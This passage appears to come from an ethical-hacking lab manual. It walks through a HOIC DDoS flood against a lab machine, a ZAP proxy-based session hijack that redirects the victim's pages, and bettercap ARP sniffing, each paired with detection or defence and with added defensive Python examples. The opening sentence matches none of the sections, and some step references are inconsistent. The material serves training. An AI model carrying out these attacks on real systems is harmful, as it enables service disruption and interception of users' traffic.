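Because the source is spoofed, the alert names the framed host (10.10.10.19), not the Parrot machine, which is exactly why step 22 is worth noting when you triage such an alert.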

Detect and Protect against DDoS Attack using Anti DDoS Guardian
Anti DDoS Guardian is a DDoS attack protection tool. It protects IIS servers, Apache servers, game
servers, Camfrog servers, mail servers, FTP servers, VoIP PBX and SIP servers, and other systems.
Anti DDoS Guardian monitors each incoming and outgoing packet in Real-Time. It displays the
local address, remote address, and other information of each network flow. Anti DDoS Guardian
limits network flow number, client bandwidth, client concurrent TCP connection number, and TCP
connection rate. It also limits the UDP bandwidth, UDP connection rate, and UDP packet rate.

Here, we will detect and protect against a DDoS attack using Anti DDoS Guardian.

In this task, we will use the Windows Server 2019 and Windows Server 2016 machines to
perform a DDoS attack on the target system, Windows 10.

1. On the Windows 10 machine, navigate to D:\CEH-Tools\CEHv11 Module 10 Denial-of-Service\DoS and DDoS Protection Tools\Anti DDoS Guardian and double-click Anti_DDoS_Guardian_setup.exe.

If a User Account Control pop-up appears, click Yes.

2. The Setup - Anti DDoS Guardian window appears; click Next. Follow the wizard-driven
installation steps to install the application.
3. In the Stop Windows Remote Desktop Brute Force wizard, uncheck the install Stop
RDP Brute Force option, and click Next.
4. The Select Additional Tasks wizard appears; check the Create a desktop
shortcut option, and click Next.
5. The Ready to Install wizard appears; click Install.
6. The Completing the Anti DDoS Guardian Setup Wizard window appears; uncheck
the Launch Mini IP Blocker option and click Finish.
7. The Anti-DDoS Wizard window appears; click Continue in all the wizard steps, leaving
all the default settings. In the last window, click Finish.
8. Click Show hidden icons from the bottom-right corner of Desktop and click the Anti
DDoS Guardian icon.
9. The Anti DDoS Guardian window appears, displaying information about incoming and
outgoing traffic, as shown in the screenshot.

10. Now, click Windows Server 2019 to switch to the Windows Server 2019 machine and
click Ctrl+Alt+Delete to activate it. By default, the Administrator profile is selected;
click Pa$$w0rd to enter the password and press Enter to log in.

11. Navigate to Desktop, open the High Orbit Ion Cannon (HOIC) folder, and double-
click hoic2.1.exe.

If an Open File - Security Warning pop-up appears, click Run.

12. The HOIC GUI main window appears. Click the “+” button below the TARGETS section.

13. The HOIC - [Target] pop-up appears. Type the target URL such as http://[Target IP
Address] (here, the target IP address is 10.10.10.10 [Windows 10]) in the URL field. Slide
the Power bar to High. Under the Booster section, select GenericBoost.hoic from the
drop-down list and click Add.

14. Set the THREADS value to 20 by clicking the > button until the value is reached.

15. Now, click Windows Server 2016 to switch to the Windows Server 2016 machine and
click Ctrl+Alt+Delete to activate it. By default, the CEH\Administrator profile is
selected; click Pa$$w0rd to enter the password and press Enter to log in. Follow Steps 12-15
to launch and configure HOIC.
16. Once HOIC is configured on both machines, switch to each machine (Windows Server
2019 and Windows Server 2016) and click the FIRE TEH LAZER! button to initiate the
DDoS attack on the target Windows 10 machine.

To switch to the Windows Server 2019, click Windows Server 2019.


To switch to the Windows Server 2016, click Windows Server 2016.

17. Observe that the Status changes from READY to ENGAGING, as shown in the
screenshot.

18. Click Windows 10 to switch back to the Windows 10 machine and observe the packets
captured by Anti DDoS Guardian.
19. Observe the huge number of packets coming from the host machines (10.10.10.19
[Windows Server 2019] and 10.10.10.16 [Windows Server 2016]).

20. Double-click any of the sessions 10.10.10.19 or 10.10.10.16.

Here, we have selected 10.10.10.16. You can select either of them.

21. The Anti DDoS Guardian Traffic Detail Viewer window appears, displaying the content
of the selected session in the form of raw data. You can observe the high number of
incoming bytes from Remote IP address 10.10.10.16, as shown in the screenshot.

22. You can use various options from the left-hand pane such as Clear, Stop Listing, Block
IP, and Allow IP. Using the Block IP option blocks the IP address sending the huge number
of packets.
23. In the Traffic Detail Viewer window, click Block IP option from the left pane.

24. Observe that the blocked IP session turns red in the Action Taken column.

25. Similarly, you can Block IP the address of the 10.10.10.19 session.
26. On completion of the task, click FIRE TEH LAZER! again, and then close the HOIC
window on all attacker machines (Windows Server 2019 and Windows Server 2016).

To switch to the Windows Server 2019, click Windows Server 2019.
To switch to the Windows Server 2016, click Windows Server 2016.

27. This concludes the demonstration of how to detect and protect against a DDoS attack
using Anti DDoS Guardian.
28. Close all open windows and document all the acquired information.
29. You can also use other DoS and DDoS protection tools such as Imperva Incapsula
DDoS Protection (https://www.incapsula.com), DOSarrest’s DDoS protection
service (https://www.dosarrest.com), DDoS-GUARD (https://ddos-guard.net),
and Cloudflare (https://www.cloudflare.com) to protect an organization’s systems and
networks from DoS and DDoS attacks.
30. Navigate to Control Panel --> Programs --> Programs and Features and
uninstall Anti DDoS Guardian.
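The per-client limits described for Anti DDoS Guardian above (packet rate, concurrent TCP connections) and the Block IP action of Steps 19-25 can be reproduced as a small offline check. The following is an added example, not Anti DDoS Guardian's code or any code from this manual: it runs over constructed flow records for the three lab addresses, computes each remote address's peak packets-per-second and distinct connection count, and returns the addresses that exceed the limits; the thresholds and the allow list are assumptions.

```python
"""Flag remote addresses that exceed a packet-rate or connection-count limit,
mirroring the per-client limits and Block IP action described above.
Added example over constructed records; not Anti DDoS Guardian's own code."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # seconds since capture start
    src: str       # remote address
    dst: str       # local (protected) address
    dport: int
    sport: int


# Constructed sample: the two flooding hosts from the lab send 300 packets
# each in three seconds on fresh source ports; one ordinary client sends six.
SAMPLE_FLOWS = (
    [Flow(i * 0.01, "10.10.10.19", "10.10.10.10", 80, 40000 + i) for i in range(300)]
    + [Flow(i * 0.01, "10.10.10.16", "10.10.10.10", 80, 40000 + i) for i in range(300)]
    + [Flow(i * 0.5, "10.10.10.5", "10.10.10.10", 80, 50000 + i % 4) for i in range(6)]
)


def per_source_stats(flows, window=1.0):
    """Return {src: (peak packets seen in any `window` seconds, distinct connections)}."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)
    stats = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        peak, start = 0, 0
        for end in range(len(fl)):              # sliding window over timestamps
            while fl[end].ts - fl[start].ts > window:
                start += 1
            peak = max(peak, end - start + 1)
        conns = len({(f.src, f.sport, f.dst, f.dport) for f in fl})
        stats[src] = (peak, conns)
    return stats


def block_list(flows, max_pps=100, max_conns=50, allow=()):
    """Addresses to block: over either limit and not on the allow list (assumed thresholds)."""
    blocked = []
    for src, (peak, conns) in sorted(per_source_stats(flows).items()):
        if src in allow:
            continue
        if peak > max_pps or conns > max_conns:
            blocked.append(src)
    return blocked


if __name__ == "__main__":
    for src, (peak, conns) in sorted(per_source_stats(SAMPLE_FLOWS).items()):
        print(f"{src:14} peak/s={peak:4} conns={conns}")
    print("block:", block_list(SAMPLE_FLOWS))
```

The allow list matters in practice: a load balancer or NAT gateway in front of the server legitimately opens many connections from one address, and blocking it would complete the denial of service the attacker started.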

Experiment – 10

Hijack a Session using Zed Attack Proxy (ZAP)

Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding vulnerabilities in
web applications. It offers automated scanners as well as a set of tools that allow you to find
security vulnerabilities manually. It is designed to be used by people with a wide range of
security experience, and as such is ideal for developers and functional testers who are new to
penetration testing.

ZAP allows you to see all the requests you make to a web app and all the responses you
receive from it. Among other things, it allows you to see AJAX calls that may not otherwise
be outright visible. You can also set breakpoints, which allow you to change the requests and
responses in real-time.

Here, we will hijack a session using ZAP. You will learn how to intercept the traffic of
victims’ machines with a proxy and how to view all the requests and responses from them.

Before starting this task, we need to configure the proxy settings in the victim’s machine,
which in this lab will be the Windows 10 machine.

1. By default, the Windows 10 machine is selected; click Ctrl+Alt+Delete.

Alternatively, you can also click the Ctrl+Alt+Delete button under the Windows 10 machine
thumbnail in the Resources pane, or click the Ctrl+Alt+Delete button under the Commands
(thunder icon) menu.

2. By default, the Admin user profile is selected; click Pa$$w0rd to paste the password in
the Password field and press Enter to log in.

Alternatively, you can also click Pa$$w0rd under the Windows 10 machine thumbnail in
the Resources pane, or click the Type Text | Type Password button under the Commands
(thunder icon) menu.
If the Welcome to Windows wizard appears, click Continue. In the Sign in with
Microsoft wizard, click Cancel to continue.
If the Networks screen appears, click Yes to allow your PC to be discoverable by other PCs
and devices on the network.

3. Open any web browser (here, Google Chrome), click the Customize and control
Google Chrome icon, and select Settings from the context menu.

4. On the Settings page, scroll down and click the Advanced option in the browser.

5. Scroll down to the System section and click Open your computer’s proxy
settings to configure a proxy.

6. A Windows 10 Settings window opens, with the Proxy settings in the right pane.
7. Under the Manual proxy setup section, make the following changes:
o Under the Use a proxy server option, click the Off button to switch it On.
o In the Address field, type 10.10.10.19 (the IP address of the attacker’s machine).
o In the Port field, type 8080.
o Click Save.

8. After saving, close the Settings and browser windows. You have now configured the
proxy settings of the victim’s machine.
9. Click Windows Server 2019 to switch to the Windows Server 2019 machine.
Click Ctrl+Alt+Delete to activate the machine. By default, the Administrator account is
selected; click Pa$$w0rd to enter the password and press Enter.

10. Double-click the OWASP ZAP shortcut on Desktop to launch the application.

11. OWASP ZAP initializes and a prompt that reads Do you want to persist the ZAP
Session? appears. Select the No, I do not want to persist this session at this moment
in time radio button and click Start.

12. The OWASP ZAP main window appears. Click on the “+” icon in the right pane
and select Break from the options.

The Break tab allows you to modify a response or request when ZAP has caught it. It
also allows you to modify certain elements that you cannot modify through your
browser, including:
o The header
o Hidden fields
o Disabled fields
o Fields that use JavaScript to filter out illegal characters
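The list above is the defender's lesson of this experiment: every one of those elements (hidden fields, disabled fields, JavaScript-filtered inputs) is only a browser-side convenience, and a proxy sitting between browser and server can rewrite all of them. The server must therefore re-derive or re-check each value itself. The following is an added example, not code from ZAP or from this manual: a server-side handler that ignores a client-supplied price, takes the account identity from the session rather than a disabled form field, and re-applies the character filter that the page's JavaScript would have enforced. The catalogue, field names and character rule are assumptions.

```python
"""Server-side re-validation of form fields that an intercepting proxy can rewrite.
Added example; CATALOGUE, the field names and USERNAME_RE are assumed, not from the lab."""
import re

# Constructed server-side catalogue: the client is never the source of prices.
CATALOGUE = {"SKU-100": 19.99, "SKU-200": 5.00}
# The same rule a browser-side JavaScript filter would apply; enforced again here.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,16}$")


class TamperedRequest(ValueError):
    """Raised when a submitted field disagrees with server-side truth."""


def validate_order(form, session_user):
    """Return a sanitized order dict built from server-side data, or raise TamperedRequest.

    form:         the fields as they arrived (possibly modified in transit).
    session_user: the account bound to the server-side session cookie, not to the form.
    """
    sku = form.get("sku")
    if sku not in CATALOGUE:
        raise TamperedRequest("unknown sku")

    try:
        qty = int(form.get("qty", "0"))
    except ValueError:
        raise TamperedRequest("qty is not an integer")
    if not 1 <= qty <= 99:
        raise TamperedRequest("qty out of range")

    # Disabled field: it is display-only, so a value that disagrees with the
    # session identity can only have been injected on the wire.
    if "account" in form and form["account"] != session_user:
        raise TamperedRequest("account field does not match the session")

    # JavaScript-filtered field: the filter ran (or was bypassed) in the client.
    ship_name = form.get("ship_name", "")
    if not USERNAME_RE.match(ship_name):
        raise TamperedRequest("illegal characters in ship_name")

    # Hidden field "price" is deliberately never read; the total is recomputed.
    return {
        "user": session_user,
        "sku": sku,
        "qty": qty,
        "ship_name": ship_name,
        "total": round(CATALOGUE[sku] * qty, 2),
    }


if __name__ == "__main__":
    # Constructed submission in which the hidden price was rewritten to 0.01.
    submitted = {"sku": "SKU-100", "qty": "2", "price": "0.01",
                 "account": "alice", "ship_name": "alice_1"}
    print(validate_order(submitted, "alice"))
```

Note that the handler treats a disagreeing disabled field as evidence of tampering and rejects the request rather than silently "correcting" it; that turns a proxy rewrite into a loggable event instead of a quiet failure.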

13. The Break tab is added to your OWASP ZAP window.
14. To configure ZAP as a proxy, click the Settings icon from the toolbar.

15. In the Options window, click Local Proxies in the left pane. In the right pane, under
the Local Proxy section, type 10.10.10.19 (the IP address of the Windows Server
2019 machine) in the Address field and set the Port value to the default, 8080;
click OK.

16. Click the Set break on all requests and responses icon on the main ZAP toolbar.
This button sets and unsets a global breakpoint that will trap and display the next
response or request from the victim’s machine in the Break tab.

The Set break on all requests and responses icon turns automatically from green to
red.

17. Now, click Windows 10 to switch back to the victim’s machine (Windows 10) and
launch the same browser in which you configured the proxy settings. In this lab, we have
configured the Google Chrome browser.
18. Place your mouse cursor in the address bar, click www.moviescope.com and
press Enter.
19. A message appears, stating that Your connection is not private. Click
the Advanced button.
20. On the next page, click Proceed to www.moviescope.com (unsafe) to open the
website.

21. Now, click Windows Server 2019 to switch back to the attacker machine (Windows
Server 2019) and observe that OWASP ZAP has begun to capture the requests of the
victim’s machine.
22. In Steps 18-20, we visited www.moviescope.com in the victim’s browser. Look in
the Break tab and click the Submit and step to next request or response icon on the
toolbar to capture the www.moviescope.com request.

23. An HTTP response appears; click the Submit and step to next request or
response icon on the toolbar.

24. Now, in the Break tab, modify www.moviescope.com to www.goodshopping.com in all the captured GET
requests.

If you find any URL starting with https, modify it to http.

25. Once you have modified the GET requests, click the Submit and step to next
request or response icon on the toolbar to forward the traffic to the victim’s machine.

26. Modify every HTTP request captured by OWASP ZAP until you see
the www.goodshopping.com page in the victim’s machine.

You will need to switch back and forth from the victim’s machine to see the browser
status while you do this.

27. Now, click on Windows 10 to switch to the victim’s machine (Windows 10); the
browser displays the website that the attacker wants the victim’s machine to see (in this
example, www.goodshopping.com).

It takes multiple iterations to open the Good Shopping site in the victim’s machine.

28. The victim has navigated to www.moviescope.com, but now sees www.goodshopping.com;
while the address bar displays www.moviescope.com, the window displays www.goodshopping.com.

29. Now, we shall change the proxy settings back to the default settings. To do so,
perform Steps 3-5 again.
30. In the Settings window, under the Manual proxy setup section in the right pane,
click the On button to toggle it back to Off, as shown in the screenshot.

31. This concludes the demonstration of performing session hijacking using ZAP.
32. Close all open windows and document all the acquired information.

Task 1: Detect Session Hijacking using Wireshark

Wireshark allows you to capture and interactively browse the traffic running on a network. The
tool uses WinPcap to capture packets, and so is only able to capture packets on networks that
are supported by WinPcap. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC,
ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Security professionals can use
Wireshark to monitor and detect session hijacking attempts.

Here, we will use the Wireshark tool to detect session hijacking attacks manually on the target
system.

We will use the Parrot Security (10.10.10.13) machine to carry out a session hijacking attack on
the Windows 10 (10.10.10.10) machine.

1. Click Windows 10 to switch to the Windows 10 machine. On the Desktop, double-click the Wireshark shortcut.

2. The Wireshark Network Analyzer window opens. Double-click the primary network
interface (in this case, Ethernet 2) to start capturing network traffic.

3. Wireshark starts capturing network traffic. Leave it running.


4. Now, we shall launch a session hijacking attack on the target machine (Windows 10)
using bettercap.

To do so, you may either follow Steps 8-18 below, or refer to Task 2 (Intercept HTTP Traffic
using bettercap) in Lab 1.

5. Click Parrot Security to switch to the Parrot Security machine.


6. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

7. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
8. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

9. Now, type cd and press Enter to jump to the root directory.

10. In the terminal window, type bettercap -iface eth0 and press Enter to set the network
interface.

-iface: specifies the interface to bind to (in this example, eth0).

11. Type net.probe on and press Enter. This module will send different types of probe
packets to each IP in the current subnet for the net.recon module to detect them.
12. Type net.recon on and press Enter. This module is responsible for periodically reading
the system ARP table to detect new hosts on the network.

The net.recon module displays the detected active IP addresses in the network. In real-time,
this module will start sniffing network packets.

13. Type net.sniff on and press Enter. This module is responsible for performing sniffing on
the network.
14. You can observe that bettercap starts sniffing network traffic on different machines in
the network, as shown in the screenshot.

15. Click Windows 10 to switch back to the Windows 10 machine and observe the huge
number of ARP packets captured by Wireshark, as shown in the screenshot.

bettercap sends several ARP broadcast requests to the hosts (or potentially active hosts). A
high number of ARP requests indicates that the system at 10.10.10.13 (the attacker’s system
in this task) is acting as a client for all the IP addresses in the subnet, which means that all
the packets from the victim node (in this case, 10.10.10.10) will first go to the host system
(10.10.10.13), and then the gateway. Similarly, any packet destined for the victim node is
first forwarded from the gateway to the host system, and then from the host system to the
victim node.
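The two signs the paragraph above tells you to look for in the Wireshark capture, a burst of ARP requests from one sender covering the whole subnet and one host inserting itself between the victim and the gateway, can be checked programmatically once the ARP fields are exported. The following is an added example, not bettercap's or Wireshark's code and not part of this manual: it runs over a constructed packet list (opcode, sender MAC, sender IP, target IP) for the lab's 10.10.10.0/24 network and reports senders that probed many addresses as well as MACs that advertised more than one IP. The MAC addresses, the record format and the probe threshold are assumptions.

```python
"""Spot ARP scanning and ARP spoofing patterns in an exported packet list.
Added example over constructed records; the tuple format and the MAC addresses
are assumptions, not Wireshark's export format or the lab's real hardware."""
from collections import Counter, defaultdict

# Record layout: (opcode, sender_mac, sender_ip, target_ip); opcode 1 = request, 2 = reply.
ATTACKER_MAC = "00:0c:29:aa:bb:cc"   # constructed value for the 10.10.10.13 host


def constructed_capture():
    """Constructed sample resembling the capture described above."""
    pkts = []
    # Probe burst: who-has for every address in the /24, all from 10.10.10.13.
    for host in range(1, 255):
        pkts.append((1, ATTACKER_MAC, "10.10.10.13", f"10.10.10.{host}"))
    # Replies in which the same MAC claims the gateway's and the victim's addresses,
    # the step that puts the attacker in the path between 10.10.10.10 and the gateway.
    pkts.append((2, ATTACKER_MAC, "10.10.10.1", "10.10.10.10"))
    pkts.append((2, ATTACKER_MAC, "10.10.10.10", "10.10.10.1"))
    # Benign request/reply pair between the victim and the real gateway.
    pkts.append((1, "00:50:56:11:22:33", "10.10.10.10", "10.10.10.1"))
    pkts.append((2, "00:50:56:44:55:66", "10.10.10.1", "10.10.10.10"))
    return pkts


def arp_findings(pkts, scan_threshold=50):
    """Return {'scanners': [sender IPs that sent >= scan_threshold requests],
               'spoofers': {mac: sorted IPs it claimed, for MACs claiming > 1 IP}}."""
    requests_by_sender = Counter()
    ips_by_mac = defaultdict(set)
    for opcode, sender_mac, sender_ip, _target_ip in pkts:
        if opcode == 1:
            requests_by_sender[sender_ip] += 1
        ips_by_mac[sender_mac].add(sender_ip)
    scanners = sorted(ip for ip, n in requests_by_sender.items() if n >= scan_threshold)
    spoofers = {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return {"scanners": scanners, "spoofers": spoofers}


if __name__ == "__main__":
    findings = arp_findings(constructed_capture())
    print("scanners:", findings["scanners"])
    for mac, ips in findings["spoofers"].items():
        print(f"{mac} claimed {', '.join(ips)}")
```

On a real capture the request count alone is noisy (DHCP servers and monitoring hosts also probe the subnet), so the MAC-to-many-IPs finding is the stronger signal; the request burst mainly tells you where to start looking.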

This concludes the demonstration of how to detect a session hijacking attack using
Wireshark.
